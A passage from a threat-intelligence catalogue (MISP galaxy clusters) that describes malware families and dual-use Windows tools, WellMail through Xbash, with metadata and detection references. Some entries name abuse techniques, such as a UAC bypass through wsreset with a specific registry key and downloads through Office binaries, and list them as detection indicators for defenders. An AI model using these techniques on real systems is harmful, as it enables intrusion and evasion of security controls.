Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0109 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WellMail
WellMail is a lightweight malware written in Golang used by APT29, similar in design and structure to WellMess.[CISA WellMail July 2020][NCSC APT29 July 2020]
Internal MISP references
UUID b936a1b3-5493-4d6c-9b69-29addeace418
which can be used as unique global reference for WellMail
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0515 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WellMess
WellMess is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by APT29.[CISA WellMess July 2020][PWC WellMess July 2020][NCSC APT29 July 2020]
Internal MISP references
UUID 20725ec7-ee35-44cf-bed6-91158aa03ce4
which can be used as unique global reference for WellMess
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0514 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Wevtutil
Wevtutil is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.[Wevtutil Microsoft Documentation]
Internal MISP references
UUID 2bcbcea6-192a-4501-aab1-1edde53875fa
which can be used as unique global reference for Wevtutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0645 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '5db11c6f-cba4-4865-b993-7a3aafd0f037', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wfc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
Author: Jimmy (@bohops)
Paths: * C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Resources: * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_wfc.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[Wfc.exe - LOLBAS Project]
Internal MISP references
UUID dadd1243-6a4a-4ce2-9eea-1c530e7510d9
which can be used as unique global reference for Wfc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5249 |
source | Tidal Cyber |
tags | ['be621f15-1788-490f-b8bb-85511a5a8074', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
WhisperGate
WhisperGate is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.[Cybereason WhisperGate February 2022][Unit 42 WhisperGate January 2022][Microsoft WhisperGate January 2022]
Internal MISP references
UUID 791f0afd-c2c4-4e23-8aee-1d14462667f5
which can be used as unique global reference for WhisperGate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0689 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Wiarp
Wiarp is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Wiarp May 2012]
Internal MISP references
UUID 7b393608-c141-48af-ae3d-3eff13c3e01c
which can be used as unique global reference for Wiarp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0206 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Windows Credential Editor
Windows Credential Editor is a password dumping tool. [Amplia WCE]
Internal MISP references
UUID 7c2c44d7-b307-4e13-b181-52352975a6f5
which can be used as unique global reference for Windows Credential Editor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0005 |
source | MITRE |
tags | ['1d306cbd-9894-4322-a233-b1576b8e25ba'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
WINDSHIELD
WINDSHIELD is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID ed50dcf7-e283-451e-95b1-a8485f8dd214
which can be used as unique global reference for WINDSHIELD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0155 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WindTail
WindTail is a macOS surveillance implant used by Windshift. WindTail shares code similarities with Hack Back aka KitM OSX.[SANS Windshift August 2018][objective-see windtail1 dec 2018][objective-see windtail2 jan 2019]
Internal MISP references
UUID 3afe711d-ed58-4c94-a9b6-9c847e1e8a2f
which can be used as unique global reference for WindTail
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0466 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WINERACK
WINERACK is a backdoor used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 5f994df7-55b0-4383-8ebc-506d4987292a
which can be used as unique global reference for WINERACK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0219 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winexe
Winexe is a lightweight, open source tool similar to PsExec designed to allow system administrators to execute commands on remote servers. [Winexe Github Sept 2013] Winexe is unique in that it is a GNU/Linux based client. [Überwachung APT28 Forfiles June 2015]
Internal MISP references
UUID 65d5b524-0e84-417d-9884-e2c501abfacd
which can be used as unique global reference for Winexe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0191 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wingbird
Wingbird is a backdoor that appears to be a version of commercial software FinFisher. It is reportedly used to attack individual computers instead of networks. It was used by NEODYMIUM in a May 2016 campaign. [Microsoft SIR Vol 21] [Microsoft NEODYMIUM Dec 2016]
Internal MISP references
UUID 3e70078f-407e-4b03-b604-bdc05b372f37
which can be used as unique global reference for Wingbird
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0176 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
winget
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Package Manager tool
Author: Paul Sanders
Paths: * C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe
Resources: * https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html * https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended
Detection: * IOC: winget.exe spawned with local manifest file * IOC: Sysmon Event ID 1 - Process Creation * Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html * Sigma: proc_creation_win_winget_local_install_via_manifest.yml[winget.exe - LOLBAS Project]
Internal MISP references
UUID 6c4e7a00-0151-490c-8a41-98981d355725
which can be used as unique global reference for winget
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5174 |
source | Tidal Cyber |
tags | ['61f778ca-b2f1-4877-b0f5-fd5e87b6ddab', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
WinMM
WinMM is a full-featured, simple backdoor used by Naikon. [Baumgartner Naikon 2015]
Internal MISP references
UUID e10423c2-71a7-4878-96ba-343191136c19
which can be used as unique global reference for WinMM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0059 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winnti for Linux
Winnti for Linux is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including Winnti Group. The Windows variant is tracked separately under Winnti for Windows.[Chronicle Winnti for Linux May 2019]
Internal MISP references
UUID e384e711-0796-4cbc-8854-8c3f939faf57
which can be used as unique global reference for Winnti for Linux
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0430 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winnti for Windows
Winnti for Windows is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, Winnti Group.[Kaspersky Winnti April 2013][Microsoft Winnti Jan 2017][Novetta Winnti April 2015][401 TRG Winnti Umbrella May 2018]. The Linux variant is tracked separately under Winnti for Linux.[Chronicle Winnti for Linux May 2019]
Internal MISP references
UUID 245c216e-41c3-4dec-8b23-bfc7c6a46d6e
which can be used as unique global reference for Winnti for Windows
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0141 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WinRAR
According to its website, WinRAR is a "data compression, encryption and archiving tool for Windows", which is designed to process RAR and ZIP files.[WinRAR Website] It is known to be abused by threat actors in order to archive (compress) files prior to their exfiltration from victim environments.[U.S. CISA Play Ransomware December 2023]
Internal MISP references
UUID d9792748-b81a-4d82-a45e-de05c2a23dbf
which can be used as unique global reference for WinRAR
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5081 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'c45ce044-b5b9-426a-866c-130e9f2a4427', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '23d0545e-45fa-4f0a-957e-deb923039c80'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
winrm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script used for manage Windows RM settings
Author: Oddvar Moe
Paths: * C:\Windows\System32\winrm.vbs * C:\Windows\SysWOW64\winrm.vbs
Resources: * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://www.youtube.com/watch?v=3gz1QmiMhss * https://github.com/enigma0x3/windows-operating-system-archaeology * https://redcanary.com/blog/lateral-movement-winrm-wmi/ * https://twitter.com/bohops/status/994405551751815170 * https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 * https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
Detection: * Sigma: proc_creation_win_winrm_awl_bypass.yml * Sigma: proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml * Sigma: file_event_win_winrm_awl_bypass.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[winrm.vbs - LOLBAS Project]
Internal MISP references
UUID 8807e10c-dc1b-4dab-8f60-c03a85c18873
which can be used as unique global reference for winrm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5263 |
source | Tidal Cyber |
tags | ['2eecd309-e75d-4f7b-8f6f-e11213f48b12', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
WinSCP
WinSCP is a tool used to facilitate file transfer using Secure Shell (SSH) File Transfer Protocol (FTP) for Microsoft Windows.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 3ded75ea-b253-48cd-94e7-aef53e0d1e31
which can be used as unique global reference for WinSCP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5046 |
source | Tidal Cyber |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Winword
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Reegun J (OCBC Bank)
Paths: * C:\Program Files\Microsoft Office\root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office\Office16\winword.exe * C:\Program Files\Microsoft Office\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office\Office15\winword.exe * C:\Program Files\Microsoft Office\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office14\winword.exe * C:\Program Files\Microsoft Office\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office12\winword.exe * C:\Program Files\Microsoft Office\Office12\winword.exe * C:\Program Files\Microsoft Office\Office12\winword.exe
Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection: * Sigma: proc_creation_win_office_arbitrary_cli_download.yml * IOC: Suspicious Office application Internet/network traffic[Winword.exe - LOLBAS Project]
Internal MISP references
UUID 7adaeb79-087f-4d65-8f8f-d4689755b107
which can be used as unique global reference for Winword
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5250 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '228354f0-c709-4a16-a489-c5098ae06c17', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wiper
Wiper is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. [Dell Wiper]
Internal MISP references
UUID 627e05c2-c02e-433e-9288-c2d78bce156f
which can be used as unique global reference for Wiper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0041 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
WIREFIRE
WIREFIRE is a web shell written in Python that exists as trojanized logic to the visits.py component of Ivanti Connect Secure VPN appliances. WIREFIRE was used during Cutting Edge for downloading files and command execution.[Mandiant Cutting Edge January 2024]
Internal MISP references
UUID 93b02819-8acc-5d7d-ad11-abb33f9309cc
which can be used as unique global reference for WIREFIRE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1115 |
source | MITRE |
type | ['malware'] |
Wireshark
Wireshark is a popular open-source packet analyzer utility.
Internal MISP references
UUID 804da3b9-9c3a-4937-aa4a-efddfa5c176e
which can be used as unique global reference for Wireshark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5269 |
source | Tidal Cyber |
tags | ['dbe18a6a-c8f9-451e-837e-5a7f25dcf913', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Wlrmdr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Logon Reminder executable
Author: Moshe Kaplan
Paths: * c:\windows\system32\wlrmdr.exe
Resources: * https://twitter.com/0gtweet/status/1493963591745220608 * https://twitter.com/Oddvarmoe/status/927437787242090496 * https://twitter.com/falsneg/status/1461625526640992260 * https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw
Detection: * Sigma: proc_creation_win_lolbin_wlrmdr.yml * IOC: wlrmdr.exe spawning any new processes[Wlrmdr.exe - LOLBAS Project]
Internal MISP references
UUID f3eb99a8-b7b5-4e90-8e99-3f38309402c0
which can be used as unique global reference for Wlrmdr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5175 |
source | Tidal Cyber |
tags | ['ebf92004-6e43-434c-8380-3671cf3640a2', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Wmic
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
Author: Oddvar Moe
Paths: * C:\Windows\System32\wbem\wmic.exe * C:\Windows\SysWOW64\wbem\wmic.exe
Resources: * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html * https://twitter.com/subTee/status/986234811944648707
Detection: * Sigma: image_load_wmic_remote_xsl_scripting_dlls.yml * Sigma: proc_creation_win_wmic_xsl_script_processing.yml * Sigma: proc_creation_win_wmic_squiblytwo_bypass.yml * Sigma: proc_creation_win_wmic_eventconsumer_creation.yml * Elastic: defense_evasion_suspicious_wmi_script.toml * Elastic: persistence_via_windows_management_instrumentation_event_subscription.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: xsl_script_execution_with_wmic.yml * Splunk: remote_wmi_command_attempt.yml * Splunk: remote_process_instantiation_via_wmi.yml * Splunk: process_execution_via_wmi.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Wmic retrieving scripts from remote system/Internet location * IOC: DotNet CLR libraries loaded into wmic.exe * IOC: DotNet CLR Usage Log - wmic.exe.log[LOLBAS Wmic]
Internal MISP references
UUID 24f3b066-a533-4b6c-a590-313a67154ba0
which can be used as unique global reference for Wmic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5176 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '9988b5fd-6235-4a8e-bb8e-d9124ead11d4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Woody RAT
Woody RAT is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.[MalwareBytes WoodyRAT Aug 2022]
Internal MISP references
UUID 1f374a54-c839-5139-b755-555c66a21c12
which can be used as unique global reference for Woody RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1065 |
source | MITRE |
type | ['malware'] |
WorkFolders
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Work Folders
Author: Elliot Killick
Paths: * C:\Windows\System32\WorkFolders.exe
Resources: * https://www.ctus.io/2021/04/12/exploading/ * https://twitter.com/ElliotKillick/status/1449812843772227588
Detection: * Sigma: proc_creation_win_susp_workfolders.yml * IOC: WorkFolders.exe should not be run on a normal workstation[WorkFolders.exe - LOLBAS Project]
Internal MISP references
UUID 7720f60a-5c03-4241-b635-6313eceb3307
which can be used as unique global reference for WorkFolders
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5177 |
source | Tidal Cyber |
tags | ['b5581207-a45f-4f7f-b637-14444d716ad1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Wscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute scripts
Author: Oddvar Moe
Paths: * C:\Windows\System32\wscript.exe * C:\Windows\SysWOW64\wscript.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_wscript_cscript_script_exec.yml * Sigma: file_event_win_net_cli_artefact.yml * Sigma: image_load_susp_script_dotnet_clr_dll_load.yml * Elastic: defense_evasion_unusual_dir_ads.toml * Elastic: command_and_control_remote_file_copy_scripts.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: wscript_or_cscript_suspicious_child_process.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Wscript.exe executing code from alternate data streams * IOC: DotNet CLR libraries loaded into wscript.exe * IOC: DotNet CLR Usage Log - wscript.exe.log[Wscript.exe - LOLBAS Project]
Internal MISP references
UUID be8d1032-3452-4d44-83cb-c7ece7d5a052
which can be used as unique global reference for Wscript
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5178 |
source | Tidal Cyber |
tags | ['b4520b56-73e3-43fd-9f0d-70191132b451', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wsl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows subsystem for Linux executable
Author: Matthew Brown
Paths: * C:\Windows\System32\wsl.exe
Resources: * https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * https://twitter.com/nas_bench/status/1535431474429808642
Detection: * Sigma: proc_creation_win_wsl_lolbin_execution.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Child process from wsl.exe[Wsl.exe - LOLBAS Project]
Internal MISP references
UUID 9663965e-0fd1-45c3-a138-c7539ed91832
which can be used as unique global reference for Wsl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5251 |
source | Tidal Cyber |
tags | ['96ebb518-7c1f-4011-a3ec-42aa78a95e4f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Wsreset
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to reset Windows Store settings according to its manifest file
Author: Oddvar Moe
Paths: * C:\Windows\System32\wsreset.exe
Resources: * https://www.activecyber.us/activelabs/windows-uac-bypass * https://twitter.com/ihack4falafel/status/1106644790114947073 * https://github.com/hfiref0x/UACME/blob/master/README.md
Detection: * Sigma: proc_creation_win_uac_bypass_wsreset_integrity_level.yml * Sigma: proc_creation_win_uac_bypass_wsreset.yml * Sigma: registry_event_bypass_via_wsreset.yml# * Splunk: wsreset_uac_bypass.yml * IOC: wsreset.exe launching child process other than mmc.exe * IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command * IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen[Wsreset.exe - LOLBAS Project]
Internal MISP references
UUID b75e4dcf-62ed-44cc-b9d2-d6d1b90955a8
which can be used as unique global reference for Wsreset
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5179 |
source | Tidal Cyber |
tags | ['291fab5d-e732-4b19-83e4-ee642b2ae0f0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
wt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Terminal
Author: Nasreddine Bencherchali
Paths:
* C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_
Resources: * https://twitter.com/nas_bench/status/1552100271668469761
Detection: * Sigma: proc_creation_win_windows_terminal_susp_children.yml[wt.exe - LOLBAS Project]
Internal MISP references
UUID a34b303e-e8bb-48b2-85e0-f6e2620d68ab
which can be used as unique global reference for wt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5184 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
wuauclt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Update Client
Author: David Middlehurst
Paths: * C:\Windows\System32\wuauclt.exe
Resources: * https://dtm.uk/wuauclt/
Detection: * Sigma: net_connection_win_wuauclt_network_connection.yml * Sigma: proc_creation_win_lolbin_wuauclt.yml * Sigma: proc_creation_win_wuauclt_execution.yml * IOC: wuauclt run with a parameter of a DLL path * IOC: Suspicious wuauclt Internet/network connections[wuauclt.exe - LOLBAS Project]
Internal MISP references
UUID 06fe608d-a517-492f-8557-cfb820984146
which can be used as unique global reference for wuauclt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5180 |
source | Tidal Cyber |
tags | ['03f0e493-63ae-47b5-8353-238390a895a8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
XAgentOSX
XAgentOSX is a trojan that has been used by APT28 on OS X and appears to be a port of their standard CHOPSTICK or XAgent trojan. [XAgentOSX 2017]
Internal MISP references
UUID 6f411b69-6643-4cc7-9cbd-e15d9219e99c
which can be used as unique global reference for XAgentOSX
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0161 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Xbash
Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[Unit42 Xbash Sept 2018]
Internal MISP references
UUID ab442140-0761-4227-bd9e-151da5d0a04f
which can be used as unique global reference for Xbash
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
